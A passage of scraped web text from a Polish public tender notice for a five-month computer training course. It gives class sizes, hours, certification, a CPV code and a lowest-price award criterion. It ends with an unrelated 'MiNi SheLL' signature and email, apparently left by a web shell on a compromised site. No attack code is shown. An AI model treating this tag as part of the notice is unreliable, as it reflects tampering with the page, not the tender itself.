-samodzielne stanowisko komputerowe dla każdego uczestnika szkolenia,
-prowadzenie zajęć równolegle w dwóch grupach liczących po 8 - 9 osób,
-prowadzenie zajęć codziennie w dni robocze, w wymiarze około 7-8 godzin lecyjnych, 
-wydanie zaświadczenia o ukończeniu szkolenia zawierającego wykaz przedmiotów objętych szkoleniem z podaniem liczby godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com